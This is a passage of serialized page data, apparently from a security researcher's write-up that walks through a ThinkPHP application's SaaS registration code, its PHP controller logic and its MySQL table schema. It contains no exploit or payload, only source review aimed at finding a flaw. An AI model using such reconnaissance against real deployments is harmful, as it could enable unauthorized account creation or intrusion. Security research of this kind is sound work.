if(!$this->check_verify(I('verify'))){\n",[1373,47137,47138],{"class":1375,"line":4806},[1373,47139,47140],{"class":4630},"        $this->error(L('_VALID_VERIFY_ERROR_'));exit;\n",[1373,47142,47143],{"class":1375,"line":4817},[1373,47144,18076],{"class":4630},[1373,47146,47147],{"class":1375,"line":4825},[1373,47148,47149],{"class":4630},"    *\u002F\n",[1373,47151,47152],{"class":1375,"line":4835},[1373,47153,47154],{"class":4640},"     \n",[1373,47156,47157,47159,47162,47164,47166,47168,47171,47173,47175],{"class":1375,"line":4843},[1373,47158,7362],{"class":1383},[1373,47160,47161],{"class":4640},"res ",[1373,47163,5417],{"class":1397},[1373,47165,35288],{"class":34505},[1373,47167,4667],{"class":1397},[1373,47169,47170],{"class":7297},"reg_saas",[1373,47172,1384],{"class":1383},[1373,47174,445],{"class":5467},[1373,47176,4680],{"class":1383},[1373,47178,47179],{"class":1375,"line":4849},[1373,47180,47181],{"class":4640},"    \n",[1373,47183,47184,47186,47188,47191,47193,47195,47197,47199],{"class":1375,"line":4877},[1373,47185,4695],{"class":4636},[1373,47187,34467],{"class":1383},[1373,47189,47190],{"class":4640},"res",[1373,47192,7035],{"class":1383},[1373,47194,1388],{"class":1387},[1373,47196,9216],{"class":1391},[1373,47198,1388],{"class":1387},[1373,47200,47201],{"class":1383},"]){\n",[1373,47203,47204,47206,47209,47211,47214,47216,47218,47221,47223,47225,47228,47230,47232,47235,47237,47239,47241,47243,47246,47248,47251,47253,47256],{"class":1375,"line":4915},[1373,47205,4727],{"class":1383},[1373,47207,47208],{"class":4640},"url ",[1373,47210,5417],{"class":1397},[1373,47212,47213],{"class":7297}," sp_get_host",[1373,47215,7514],{"class":1383},[1373,47217,1398],{"class":1397},[1373,47219,47220],{"class":7297}," 
U",[1373,47222,1384],{"class":1383},[1373,47224,1388],{"class":1387},[1373,47226,47227],{"class":1391},"reg_activation",[1373,47229,1388],{"class":1387},[1373,47231,5437],{"class":1383},[1373,47233,47234],{"class":1379},"array",[1373,47236,1384],{"class":1383},[1373,47238,1388],{"class":1387},[1373,47240,47076],{"class":1391},[1373,47242,1388],{"class":1387},[1373,47244,47245],{"class":1397},"=>",[1373,47247,4644],{"class":1383},[1373,47249,47250],{"class":4640},"saasId",[1373,47252,27548],{"class":1383},[1373,47254,47255],{"class":1383},"  ;",[1373,47257,47258],{"class":4630}," \u002F\u002F生成激活的URL地址\n",[1373,47260,47261],{"class":1375,"line":4931},[1373,47262,47263],{"class":4630},"        \u002F\u002F发送邮件\n",[1373,47265,47266,47268,47271,47273,47276,47278,47280,47283,47285,47287],{"class":1375,"line":4947},[1373,47267,4727],{"class":1383},[1373,47269,47270],{"class":4640},"subject ",[1373,47272,5417],{"class":1397},[1373,47274,47275],{"class":7297}," L",[1373,47277,1384],{"class":1383},[1373,47279,1388],{"class":1387},[1373,47281,47282],{"class":1391},"_ACTIVATION_MAIL_SUBJECT_",[1373,47284,1388],{"class":1387},[1373,47286,2230],{"class":1383},[1373,47288,47289],{"class":1383}," ;\n",[1373,47291,47292,47294,47297,47299,47301,47303,47305,47308,47310,47312],{"class":1375,"line":4952},[1373,47293,4727],{"class":1383},[1373,47295,47296],{"class":4640},"content 
",[1373,47298,5417],{"class":1397},[1373,47300,47275],{"class":7297},[1373,47302,1384],{"class":1383},[1373,47304,1388],{"class":1387},[1373,47306,47307],{"class":1391},"_ACTIVATION_MAIL_CONTENT_",[1373,47309,1388],{"class":1387},[1373,47311,2230],{"class":1383},[1373,47313,47289],{"class":1383},[1373,47315,47316,47318,47320,47322,47324,47326,47328,47331,47333,47336,47338,47340,47342],{"class":1375,"line":6776},[1373,47317,4727],{"class":1383},[1373,47319,47296],{"class":4640},[1373,47321,5417],{"class":1397},[1373,47323,34816],{"class":1379},[1373,47325,1384],{"class":1383},[1373,47327,1388],{"class":1387},[1373,47329,47330],{"class":1391},"[url]",[1373,47332,1388],{"class":1387},[1373,47334,47335],{"class":1383},",$",[1373,47337,7585],{"class":4640},[1373,47339,47335],{"class":1383},[1373,47341,13389],{"class":4640},[1373,47343,4680],{"class":1383},[1373,47345,47346,47348,47350,47352,47354,47356,47358,47361,47363,47365,47368,47370,47373,47375,47377],{"class":1375,"line":6781},[1373,47347,4727],{"class":1383},[1373,47349,47296],{"class":4640},[1373,47351,5417],{"class":1397},[1373,47353,34816],{"class":1379},[1373,47355,1384],{"class":1383},[1373,47357,1388],{"class":1387},[1373,47359,47360],{"class":1391},"[minute]",[1373,47362,1388],{"class":1387},[1373,47364,47335],{"class":1383},[1373,47366,47367],{"class":4640},"M",[1373,47369,4667],{"class":1397},[1373,47371,47372],{"class":4640},"activation_expire_miniute",[1373,47374,47335],{"class":1383},[1373,47376,13389],{"class":4640},[1373,47378,4680],{"class":1383},[1373,47380,47381,47383,47385,47387,47390,47392,47394,47396,47398,47400,47402,47404,47406,47409,47411,47413,47415,47417],{"class":1375,"line":7524},[1373,47382,4727],{"class":1383},[1373,47384,47161],{"class":4640},[1373,47386,5417],{"class":1397},[1373,47388,47389],{"class":7297},"sp_send_mail",[1373,47391,34467],{"class":1383},[1373,47393,9156],{"class":4640},[1373,47395,7035],{"class":1383},[1373,47397,1388],{"class":1387},[1373,47399,46913],{"class":139
1},[1373,47401,1388],{"class":1387},[1373,47403,27625],{"class":1383},[1373,47405,4656],{"class":1383},[1373,47407,47408],{"class":4640},"subject",[1373,47410,5437],{"class":1383},[1373,47412,4656],{"class":1383},[1373,47414,13389],{"class":4640},[1373,47416,2230],{"class":1383},[1373,47418,47289],{"class":1383},[1373,47420,47421,47423,47426,47428],{"class":1375,"line":7530},[1373,47422,9773],{"class":4636},[1373,47424,47425],{"class":1383}," ($",[1373,47427,47190],{"class":4640},[1373,47429,47430],{"class":1383},"){\n",[1373,47432,47433,47436,47438,47440,47442,47444,47446,47449,47451,47453,47455,47457,47459,47461,47463,47465,47467,47469],{"class":1375,"line":7546},[1373,47434,47435],{"class":1383},"            $",[1373,47437,47208],{"class":4640},[1373,47439,5417],{"class":1397},[1373,47441,47220],{"class":7297},[1373,47443,1384],{"class":1383},[1373,47445,1388],{"class":1387},[1373,47447,47448],{"class":1391},"reg_email_ok",[1373,47450,1388],{"class":1387},[1373,47452,5437],{"class":1383},[1373,47454,47234],{"class":1379},[1373,47456,1384],{"class":1383},[1373,47458,1388],{"class":1387},[1373,47460,47076],{"class":1391},[1373,47462,1388],{"class":1387},[1373,47464,47245],{"class":1397},[1373,47466,4644],{"class":1383},[1373,47468,47250],{"class":4640},[1373,47470,1413],{"class":1383},[1373,47472,47473,47476,47478,47480,47482,47484,47486,47488,47491,47493,47495,47497,47499],{"class":1375,"line":7571},[1373,47474,47475],{"class":34505},"            $this",[1373,47477,4667],{"class":1397},[1373,47479,16142],{"class":7297},[1373,47481,1384],{"class":1383},[1373,47483,13918],{"class":7297},[1373,47485,1384],{"class":1383},[1373,47487,1388],{"class":1387},[1373,47489,47490],{"class":1391},"_ADD_SUCCESS_",[1373,47492,1388],{"class":1387},[1373,47494,15534],{"class":1383},[1373,47496,4656],{"class":1383},[1373,47498,7585],{"class":4640},[1373,47500,4680],{"class":1383},[1373,47502,47503,47506,47508],{"class":1375,"line":7598},[1373,47504,47505],{"class":1383},"        
}",[1373,47507,4762],{"class":4636},[1373,47509,8904],{"class":1383},[1373,47511,47512,47514,47516,47518,47520,47522,47524,47526,47529,47531],{"class":1375,"line":7615},[1373,47513,47475],{"class":34505},[1373,47515,4667],{"class":1397},[1373,47517,10265],{"class":7297},[1373,47519,34467],{"class":1383},[1373,47521,47190],{"class":4640},[1373,47523,7035],{"class":1383},[1373,47525,1388],{"class":1387},[1373,47527,47528],{"class":1391},"err_msg",[1373,47530,1388],{"class":1387},[1373,47532,34850],{"class":1383},[1373,47534,47535],{"class":1375,"line":7635},[1373,47536,9861],{"class":1383},[1373,47538,47539,47541,47543],{"class":1375,"line":7640},[1373,47540,28032],{"class":1383},[1373,47542,4762],{"class":4636},[1373,47544,8904],{"class":1383},[1373,47546,47547,47550,47552,47554,47556,47558,47560,47563],{"class":1375,"line":7648},[1373,47548,47549],{"class":34505},"        $this",[1373,47551,4667],{"class":1397},[1373,47553,10265],{"class":7297},[1373,47555,34467],{"class":1383},[1373,47557,47367],{"class":4640},[1373,47559,4667],{"class":1397},[1373,47561,47562],{"class":7297},"getError",[1373,47564,16360],{"class":1383},[1373,47566,47567],{"class":1375,"line":7672},[1373,47568,4795],{"class":1383},[1373,47570,47571],{"class":1375,"line":7688},[1373,47572,1855],{"class":1383},[18,47574,47575,47576,982,47579,47582,47583,47585,47586,47589,47590,47592,47593,47596,47597,47599],{},"Based on some light ThinkPHP knowledge, we know that the application utilizes a ",[886,47577,47578],{},"create()",[886,47580,47581],{},"add()"," inheritance to handle creation of database objects. After the email is sent the user is redirected to a ",[886,47584,47170],{}," route and calls the function in ",[886,47587,47588],{},"Application\u002FHome\u002FController\u002FSaasController.class.php"," with the registration ",[886,47591,6946],{}," request to ",[886,47594,47595],{},"\u002Findex.php\u002FHome\u002FSaas\u002Freg_saas",". 
The following snippet completes the account registration step and creates the ",[886,47598,47076],{}," and updates the database:",[1354,47601,47603],{"className":1367,"code":47602,"language":1369,"meta":219,"style":219},"\u002F**\n * 注册SAAS\n * @param number $status\n * @param number $is_send_activation_email 是否发送激活邮件(官方注册，外面发送)\n * @return number|unknown\n *\u002F\nfunction reg_saas($status = 0,$is_send_activation_email = 1){\n    \n    $M = D('Common\u002FSaas');\n\n    $M->is_send_activation_email = $is_send_activation_email ;\n    \n    \u002F\u002F清除过期无效的数据\n    $M->clearExpire();\n    \n\n    $data = $M->create();\n\n    if (!$data){\n        return sp_api_fail(0, $M->getError()) ;\n    }\n    \n    $data['saas_status'] = $status ;\n    $res = $M->add($data);\n\n    \u002F\u002F更新接口服务\n    if ($res && $status){\n        $param = $M->where(array('saas_name'=>$data['saas_name']))->field('saas_id')->find();\n        \\Common\\Lib\\AntCmd::execUpdatePack(CMD_SAAS_UPDATE, $param['saas_id']) ;\n    }\n    \n    if ($res){\n        return sp_api_success($data);\n    }else{\n        return sp_api_fail(0, $M->getError()) ;\n    }\n    \n    \n}\n",[886,47604,47605,47609,47614,47630,47641,47656,47660,47687,47691,47714,47718,47736,47740,47745,47758,47762,47766,47786,47790,47804,47829,47833,47837,47862,47884,47888,47893,47909,47978,48029,48033,48037,48047,48060,48068,48092,48096,48100,48104],{"__ignoreMap":219},[1373,47606,47607],{"class":1375,"line":1376},[1373,47608,47086],{"class":4630},[1373,47610,47611],{"class":1375,"line":220},[1373,47612,47613],{"class":4630}," * 注册SAAS\n",[1373,47615,47616,47619,47623,47627],{"class":1375,"line":1266},[1373,47617,47618],{"class":4630}," * ",[1373,47620,47622],{"class":47621},"s41CE","@param",[1373,47624,47626],{"class":47625},"s6MXs"," number",[1373,47628,47629],{"class":4630}," 
$status\n",[1373,47631,47632,47634,47636,47638],{"class":1375,"line":1852},[1373,47633,47618],{"class":4630},[1373,47635,47622],{"class":47621},[1373,47637,47626],{"class":47625},[1373,47639,47640],{"class":4630}," $is_send_activation_email 是否发送激活邮件(官方注册，外面发送)\n",[1373,47642,47643,47645,47648,47650,47653],{"class":1375,"line":4692},[1373,47644,47618],{"class":4630},[1373,47646,47647],{"class":47621},"@return",[1373,47649,47626],{"class":47625},[1373,47651,17472],{"class":47652},"sNSxj",[1373,47654,47655],{"class":47625},"unknown\n",[1373,47657,47658],{"class":1375,"line":4724},[1373,47659,47111],{"class":4630},[1373,47661,47662,47664,47667,47669,47672,47674,47676,47678,47681,47683,47685],{"class":1375,"line":4756},[1373,47663,8560],{"class":7293},[1373,47665,47666],{"class":7297}," reg_saas",[1373,47668,34467],{"class":1383},[1373,47670,47671],{"class":4640},"status ",[1373,47673,5417],{"class":1397},[1373,47675,5557],{"class":5467},[1373,47677,47335],{"class":1383},[1373,47679,47680],{"class":4640},"is_send_activation_email ",[1373,47682,5417],{"class":1397},[1373,47684,5468],{"class":5467},[1373,47686,47430],{"class":1383},[1373,47688,47689],{"class":1375,"line":4768},[1373,47690,47181],{"class":4640},[1373,47692,47693,47695,47698,47700,47703,47705,47707,47710,47712],{"class":1375,"line":4792},[1373,47694,7362],{"class":1383},[1373,47696,47697],{"class":4640},"M ",[1373,47699,5417],{"class":1397},[1373,47701,47702],{"class":7297}," 
D",[1373,47704,1384],{"class":1383},[1373,47706,1388],{"class":1387},[1373,47708,47709],{"class":1391},"Common\u002FSaas",[1373,47711,1388],{"class":1387},[1373,47713,4680],{"class":1383},[1373,47715,47716],{"class":1375,"line":4798},[1373,47717,6520],{"emptyLinePlaceholder":237},[1373,47719,47720,47722,47724,47726,47728,47730,47732,47734],{"class":1375,"line":4806},[1373,47721,7362],{"class":1383},[1373,47723,47367],{"class":4640},[1373,47725,4667],{"class":1397},[1373,47727,47680],{"class":4640},[1373,47729,5417],{"class":1397},[1373,47731,4656],{"class":1383},[1373,47733,47680],{"class":4640},[1373,47735,4912],{"class":1383},[1373,47737,47738],{"class":1375,"line":4817},[1373,47739,47181],{"class":4640},[1373,47741,47742],{"class":1375,"line":4825},[1373,47743,47744],{"class":4630},"    \u002F\u002F清除过期无效的数据\n",[1373,47746,47747,47749,47751,47753,47756],{"class":1375,"line":4835},[1373,47748,7362],{"class":1383},[1373,47750,47367],{"class":4640},[1373,47752,4667],{"class":1397},[1373,47754,47755],{"class":7297},"clearExpire",[1373,47757,15603],{"class":1383},[1373,47759,47760],{"class":1375,"line":4843},[1373,47761,47181],{"class":4640},[1373,47763,47764],{"class":1375,"line":4849},[1373,47765,6520],{"emptyLinePlaceholder":237},[1373,47767,47768,47770,47773,47775,47777,47779,47781,47784],{"class":1375,"line":4877},[1373,47769,7362],{"class":1383},[1373,47771,47772],{"class":4640},"data 
",[1373,47774,5417],{"class":1397},[1373,47776,4656],{"class":1383},[1373,47778,47367],{"class":4640},[1373,47780,4667],{"class":1397},[1373,47782,47783],{"class":7297},"create",[1373,47785,15603],{"class":1383},[1373,47787,47788],{"class":1375,"line":4915},[1373,47789,6520],{"emptyLinePlaceholder":237},[1373,47791,47792,47794,47796,47798,47800,47802],{"class":1375,"line":4931},[1373,47793,4695],{"class":4636},[1373,47795,4641],{"class":1383},[1373,47797,16090],{"class":1397},[1373,47799,4644],{"class":1383},[1373,47801,9156],{"class":4640},[1373,47803,47430],{"class":1383},[1373,47805,47806,47808,47811,47813,47815,47817,47819,47821,47823,47825,47827],{"class":1375,"line":4947},[1373,47807,4918],{"class":4636},[1373,47809,47810],{"class":7297}," sp_api_fail",[1373,47812,1384],{"class":1383},[1373,47814,445],{"class":5467},[1373,47816,5437],{"class":1383},[1373,47818,4656],{"class":1383},[1373,47820,47367],{"class":4640},[1373,47822,4667],{"class":1397},[1373,47824,47562],{"class":7297},[1373,47826,27831],{"class":1383},[1373,47828,47289],{"class":1383},[1373,47830,47831],{"class":1375,"line":4952},[1373,47832,4795],{"class":1383},[1373,47834,47835],{"class":1375,"line":6776},[1373,47836,47181],{"class":4640},[1373,47838,47839,47841,47843,47845,47847,47850,47852,47854,47856,47858,47860],{"class":1375,"line":6781},[1373,47840,7362],{"class":1383},[1373,47842,9156],{"class":4640},[1373,47844,7035],{"class":1383},[1373,47846,1388],{"class":1387},[1373,47848,47849],{"class":1391},"saas_status",[1373,47851,1388],{"class":1387},[1373,47853,15050],{"class":1383},[1373,47855,8575],{"class":1397},[1373,47857,4656],{"class":1383},[1373,47859,47671],{"class":4640},[1373,47861,4912],{"class":1383},[1373,47863,47864,47866,47868,47870,47872,47874,47876,47878,47880,47882],{"class":1375,"line":7524},[1373,47865,7362],{"class":1383},[1373,47867,47161],{"class":4640},[1373,47869,5417],{"class":1397},[1373,47871,4656],{"class":1383},[1373,47873,47367],{"class":4640},[1373,47875,4667],{
"class":1397},[1373,47877,27649],{"class":7297},[1373,47879,34467],{"class":1383},[1373,47881,9156],{"class":4640},[1373,47883,4680],{"class":1383},[1373,47885,47886],{"class":1375,"line":7530},[1373,47887,6520],{"emptyLinePlaceholder":237},[1373,47889,47890],{"class":1375,"line":7546},[1373,47891,47892],{"class":4630},"    \u002F\u002F更新接口服务\n",[1373,47894,47895,47897,47899,47901,47903,47905,47907],{"class":1375,"line":7571},[1373,47896,4695],{"class":4636},[1373,47898,47425],{"class":1383},[1373,47900,47161],{"class":4640},[1373,47902,16504],{"class":1397},[1373,47904,4656],{"class":1383},[1373,47906,9216],{"class":4640},[1373,47908,47430],{"class":1383},[1373,47910,47911,47913,47916,47918,47920,47922,47924,47927,47929,47931,47933,47935,47937,47939,47941,47943,47945,47947,47949,47951,47953,47956,47958,47961,47963,47965,47967,47969,47971,47973,47976],{"class":1375,"line":7598},[1373,47912,4727],{"class":1383},[1373,47914,47915],{"class":4640},"param ",[1373,47917,5417],{"class":1397},[1373,47919,4656],{"class":1383},[1373,47921,47367],{"class":4640},[1373,47923,4667],{"class":1397},[1373,47925,47926],{"class":7297},"where",[1373,47928,1384],{"class":1383},[1373,47930,47234],{"class":1379},[1373,47932,1384],{"class":1383},[1373,47934,1388],{"class":1387},[1373,47936,46826],{"class":1391},[1373,47938,1388],{"class":1387},[1373,47940,47245],{"class":1397},[1373,47942,4644],{"class":1383},[1373,47944,9156],{"class":4640},[1373,47946,7035],{"class":1383},[1373,47948,1388],{"class":1387},[1373,47950,46826],{"class":1391},[1373,47952,1388],{"class":1387},[1373,47954,47955],{"class":1383},"]))",[1373,47957,4667],{"class":1397},[1373,47959,47960],{"class":7297},"field",[1373,47962,1384],{"class":1383},[1373,47964,1388],{"class":1387},[1373,47966,47076],{"class":1391},[1373,47968,1388],{"class":1387},[1373,47970,2230],{"class":1383},[1373,47972,4667],{"class":1397},[1373,47974,47975],{"class":7297},"find",[1373,47977,15603],{"class":1383},[1373,47979,47980,47984,47987,47990,
47993,47995,47998,48001,48004,48006,48009,48011,48013,48016,48018,48020,48022,48024,48027],{"class":1375,"line":7615},[1373,47981,47983],{"class":47982},"sv8o3","        \\",[1373,47985,47986],{"class":9383},"Common",[1373,47988,47989],{"class":47982},"\\",[1373,47991,47992],{"class":9383},"Lib",[1373,47994,47989],{"class":47982},[1373,47996,47997],{"class":9165},"AntCmd",[1373,47999,48000],{"class":1397},"::",[1373,48002,48003],{"class":7297},"execUpdatePack",[1373,48005,1384],{"class":1383},[1373,48007,48008],{"class":2326},"CMD_SAAS_UPDATE",[1373,48010,5437],{"class":1383},[1373,48012,4656],{"class":1383},[1373,48014,48015],{"class":4640},"param",[1373,48017,7035],{"class":1383},[1373,48019,1388],{"class":1387},[1373,48021,47076],{"class":1391},[1373,48023,1388],{"class":1387},[1373,48025,48026],{"class":1383},"])",[1373,48028,47289],{"class":1383},[1373,48030,48031],{"class":1375,"line":7635},[1373,48032,4795],{"class":1383},[1373,48034,48035],{"class":1375,"line":7640},[1373,48036,47181],{"class":4640},[1373,48038,48039,48041,48043,48045],{"class":1375,"line":7648},[1373,48040,4695],{"class":4636},[1373,48042,47425],{"class":1383},[1373,48044,47190],{"class":4640},[1373,48046,47430],{"class":1383},[1373,48048,48049,48051,48054,48056,48058],{"class":1375,"line":7672},[1373,48050,4918],{"class":4636},[1373,48052,48053],{"class":7297}," 
sp_api_success",[1373,48055,34467],{"class":1383},[1373,48057,9156],{"class":4640},[1373,48059,4680],{"class":1383},[1373,48061,48062,48064,48066],{"class":1375,"line":7688},[1373,48063,28032],{"class":1383},[1373,48065,4762],{"class":4636},[1373,48067,8904],{"class":1383},[1373,48069,48070,48072,48074,48076,48078,48080,48082,48084,48086,48088,48090],{"class":1375,"line":7709},[1373,48071,4918],{"class":4636},[1373,48073,47810],{"class":7297},[1373,48075,1384],{"class":1383},[1373,48077,445],{"class":5467},[1373,48079,5437],{"class":1383},[1373,48081,4656],{"class":1383},[1373,48083,47367],{"class":4640},[1373,48085,4667],{"class":1397},[1373,48087,47562],{"class":7297},[1373,48089,27831],{"class":1383},[1373,48091,47289],{"class":1383},[1373,48093,48094],{"class":1375,"line":7714},[1373,48095,4795],{"class":1383},[1373,48097,48098],{"class":1375,"line":7722},[1373,48099,47181],{"class":4640},[1373,48101,48102],{"class":1375,"line":9903},[1373,48103,47181],{"class":4640},[1373,48105,48106],{"class":1375,"line":9908},[1373,48107,1855],{"class":1383},[18,48109,48110,48111,48114,48115,48118],{},"There's a lot more ThinkPHP logic that handles the MVC components that wasn't worth stepping through, so when in doubt ",[886,48112,48113],{},"ripgrep",". 
A quick search and a validation that the default install provides a MySQL server landed me at the ",[886,48116,48117],{},"Application\u002FInstall\u002FData\u002Fdbcreate\u002Fms_mysql.sql"," install SQL file:",[1354,48120,48122],{"className":5372,"code":48121,"language":5374,"meta":219,"style":219},"-- ----------------------------\n-- Table structure for sys_saas\n-- ----------------------------\nDROP TABLE IF EXISTS `sys_saas`;\nCREATE TABLE `sys_saas` (\n  `SAAS_ID` varchar(50) NOT NULL DEFAULT '',\n  `SAAS_NAME` varchar(100) DEFAULT '',\n  `SAAS_SHOWNAME` varchar(100) DEFAULT '',\n  `SAAS_DBNAME` varchar(50) DEFAULT '',\n  `SAAS_DESC` varchar(255) DEFAULT '',\n  `SAAS_CREATE_DATE` bigint(20) DEFAULT '0',\n  `SAAS_STATUS` int(2) DEFAULT '0',\n  `ORG_CONTACT` varchar(50) DEFAULT '',\n  `ORG_PHONE` varchar(50) DEFAULT '',\n  `ORG_ADDRESS` varchar(255) DEFAULT '',\n  `ORG_EMAIL` varchar(50) DEFAULT '',\n  `ORG_FAX` varchar(50) DEFAULT '',\n  `ORG_POSTCODE` varchar(50) DEFAULT '',\n  `AUTH_NUMBERS` varchar(100) DEFAULT '0',\n  `AUTH_CODE` varchar(2000) DEFAULT '',\n  `AUTH_EXPIREDATE` varchar(255) DEFAULT '0',\n  `SAAS_PWD` varchar(50) DEFAULT '',\n  `SAAS_INSTALLDATE` varchar(255) DEFAULT '',\n  PRIMARY KEY (`SAAS_ID`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n",[886,48123,48124,48129,48134,48138,48161,48175,48206,48231,48254,48277,48301,48329,48357,48380,48403,48426,48449,48472,48495,48522,48546,48573,48596,48619,48634],{"__ignoreMap":219},[1373,48125,48126],{"class":1375,"line":1376},[1373,48127,48128],{"class":4630},"-- ----------------------------\n",[1373,48130,48131],{"class":1375,"line":220},[1373,48132,48133],{"class":4630},"-- Table structure for sys_saas\n",[1373,48135,48136],{"class":1375,"line":1266},[1373,48137,48128],{"class":4630},[1373,48139,48140,48143,48146,48149,48152,48154,48157,48159],{"class":1375,"line":1852},[1373,48141,48142],{"class":5387},"DROP",[1373,48144,48145],{"class":5387}," TABLE",[1373,48147,48148],{"class":5387}," 
IF",[1373,48150,48151],{"class":5387}," EXISTS",[1373,48153,19163],{"class":1387},[1373,48155,48156],{"class":1391},"sys_saas",[1373,48158,19169],{"class":1387},[1373,48160,4912],{"class":4640},[1373,48162,48163,48166,48168,48170,48172],{"class":1375,"line":4692},[1373,48164,48165],{"class":5387},"CREATE",[1373,48167,48145],{"class":5387},[1373,48169,19163],{"class":4640},[1373,48171,48156],{"class":7297},[1373,48173,48174],{"class":4640},"` (\n",[1373,48176,48177,48180,48183,48185,48188,48190,48193,48196,48199,48202,48204],{"class":1375,"line":4724},[1373,48178,48179],{"class":1387},"  `",[1373,48181,48182],{"class":1391},"SAAS_ID",[1373,48184,19169],{"class":1387},[1373,48186,48187],{"class":7293}," varchar",[1373,48189,1384],{"class":4640},[1373,48191,48192],{"class":5467},"50",[1373,48194,48195],{"class":4640},") ",[1373,48197,48198],{"class":5387},"NOT NULL",[1373,48200,48201],{"class":4652}," DEFAULT",[1373,48203,5571],{"class":1387},[1373,48205,9062],{"class":4640},[1373,48207,48208,48210,48213,48215,48217,48219,48222,48224,48227,48229],{"class":1375,"line":4756},[1373,48209,48179],{"class":1387},[1373,48211,48212],{"class":1391},"SAAS_NAME",[1373,48214,19169],{"class":1387},[1373,48216,48187],{"class":7293},[1373,48218,1384],{"class":4640},[1373,48220,48221],{"class":5467},"100",[1373,48223,48195],{"class":4640},[1373,48225,48226],{"class":4652},"DEFAULT",[1373,48228,5571],{"class":1387},[1373,48230,9062],{"class":4640},[1373,48232,48233,48235,48238,48240,48242,48244,48246,48248,48250,48252],{"class":1375,"line":4768},[1373,48234,48179],{"class":1387},[1373,48236,48237],{"class":1391},"SAAS_SHOWNAME",[1373,48239,19169],{"class":1387},[1373,48241,48187],{"class":7293},[1373,48243,1384],{"class":4640},[1373,48245,48221],{"class":5467},[1373,48247,48195],{"class":4640},[1373,48249,48226],{"class":4652},[1373,48251,5571],{"class":1387},[1373,48253,9062],{"class":4640},[1373,48255,48256,48258,48261,48263,48265,48267,48269,48271,48273,48275],{"class":1375,"line":4
792},[1373,48257,48179],{"class":1387},[1373,48259,48260],{"class":1391},"SAAS_DBNAME",[1373,48262,19169],{"class":1387},[1373,48264,48187],{"class":7293},[1373,48266,1384],{"class":4640},[1373,48268,48192],{"class":5467},[1373,48270,48195],{"class":4640},[1373,48272,48226],{"class":4652},[1373,48274,5571],{"class":1387},[1373,48276,9062],{"class":4640},[1373,48278,48279,48281,48284,48286,48288,48290,48293,48295,48297,48299],{"class":1375,"line":4798},[1373,48280,48179],{"class":1387},[1373,48282,48283],{"class":1391},"SAAS_DESC",[1373,48285,19169],{"class":1387},[1373,48287,48187],{"class":7293},[1373,48289,1384],{"class":4640},[1373,48291,48292],{"class":5467},"255",[1373,48294,48195],{"class":4640},[1373,48296,48226],{"class":4652},[1373,48298,5571],{"class":1387},[1373,48300,9062],{"class":4640},[1373,48302,48303,48305,48308,48310,48313,48315,48317,48319,48321,48323,48325,48327],{"class":1375,"line":4806},[1373,48304,48179],{"class":1387},[1373,48306,48307],{"class":1391},"SAAS_CREATE_DATE",[1373,48309,19169],{"class":1387},[1373,48311,48312],{"class":7293}," bigint",[1373,48314,1384],{"class":4640},[1373,48316,36929],{"class":5467},[1373,48318,48195],{"class":4640},[1373,48320,48226],{"class":4652},[1373,48322,4713],{"class":1387},[1373,48324,445],{"class":1391},[1373,48326,1388],{"class":1387},[1373,48328,9062],{"class":4640},[1373,48330,48331,48333,48336,48338,48341,48343,48345,48347,48349,48351,48353,48355],{"class":1375,"line":4817},[1373,48332,48179],{"class":1387},[1373,48334,48335],{"class":1391},"SAAS_STATUS",[1373,48337,19169],{"class":1387},[1373,48339,48340],{"class":7293}," 
int",[1373,48342,1384],{"class":4640},[1373,48344,353],{"class":5467},[1373,48346,48195],{"class":4640},[1373,48348,48226],{"class":4652},[1373,48350,4713],{"class":1387},[1373,48352,445],{"class":1391},[1373,48354,1388],{"class":1387},[1373,48356,9062],{"class":4640},[1373,48358,48359,48361,48364,48366,48368,48370,48372,48374,48376,48378],{"class":1375,"line":4825},[1373,48360,48179],{"class":1387},[1373,48362,48363],{"class":1391},"ORG_CONTACT",[1373,48365,19169],{"class":1387},[1373,48367,48187],{"class":7293},[1373,48369,1384],{"class":4640},[1373,48371,48192],{"class":5467},[1373,48373,48195],{"class":4640},[1373,48375,48226],{"class":4652},[1373,48377,5571],{"class":1387},[1373,48379,9062],{"class":4640},[1373,48381,48382,48384,48387,48389,48391,48393,48395,48397,48399,48401],{"class":1375,"line":4835},[1373,48383,48179],{"class":1387},[1373,48385,48386],{"class":1391},"ORG_PHONE",[1373,48388,19169],{"class":1387},[1373,48390,48187],{"class":7293},[1373,48392,1384],{"class":4640},[1373,48394,48192],{"class":5467},[1373,48396,48195],{"class":4640},[1373,48398,48226],{"class":4652},[1373,48400,5571],{"class":1387},[1373,48402,9062],{"class":4640},[1373,48404,48405,48407,48410,48412,48414,48416,48418,48420,48422,48424],{"class":1375,"line":4843},[1373,48406,48179],{"class":1387},[1373,48408,48409],{"class":1391},"ORG_ADDRESS",[1373,48411,19169],{"class":1387},[1373,48413,48187],{"class":7293},[1373,48415,1384],{"class":4640},[1373,48417,48292],{"class":5467},[1373,48419,48195],{"class":4640},[1373,48421,48226],{"class":4652},[1373,48423,5571],{"class":1387},[1373,48425,9062],{"class":4640},[1373,48427,48428,48430,48433,48435,48437,48439,48441,48443,48445,48447],{"class":1375,"line":4849},[1373,48429,48179],{"class":1387},[1373,48431,48432],{"class":1391},"ORG_EMAIL",[1373,48434,19169],{"class":1387},[1373,48436,48187],{"class":7293},[1373,48438,1384],{"class":4640},[1373,48440,48192],{"class":5467},[1373,48442,48195],{"class":4640},[1373,48444,48226],{"class":465
2},[1373,48446,5571],{"class":1387},[1373,48448,9062],{"class":4640},[1373,48450,48451,48453,48456,48458,48460,48462,48464,48466,48468,48470],{"class":1375,"line":4877},[1373,48452,48179],{"class":1387},[1373,48454,48455],{"class":1391},"ORG_FAX",[1373,48457,19169],{"class":1387},[1373,48459,48187],{"class":7293},[1373,48461,1384],{"class":4640},[1373,48463,48192],{"class":5467},[1373,48465,48195],{"class":4640},[1373,48467,48226],{"class":4652},[1373,48469,5571],{"class":1387},[1373,48471,9062],{"class":4640},[1373,48473,48474,48476,48479,48481,48483,48485,48487,48489,48491,48493],{"class":1375,"line":4915},[1373,48475,48179],{"class":1387},[1373,48477,48478],{"class":1391},"ORG_POSTCODE",[1373,48480,19169],{"class":1387},[1373,48482,48187],{"class":7293},[1373,48484,1384],{"class":4640},[1373,48486,48192],{"class":5467},[1373,48488,48195],{"class":4640},[1373,48490,48226],{"class":4652},[1373,48492,5571],{"class":1387},[1373,48494,9062],{"class":4640},[1373,48496,48497,48499,48502,48504,48506,48508,48510,48512,48514,48516,48518,48520],{"class":1375,"line":4931},[1373,48498,48179],{"class":1387},[1373,48500,48501],{"class":1391},"AUTH_NUMBERS",[1373,48503,19169],{"class":1387},[1373,48505,48187],{"class":7293},[1373,48507,1384],{"class":4640},[1373,48509,48221],{"class":5467},[1373,48511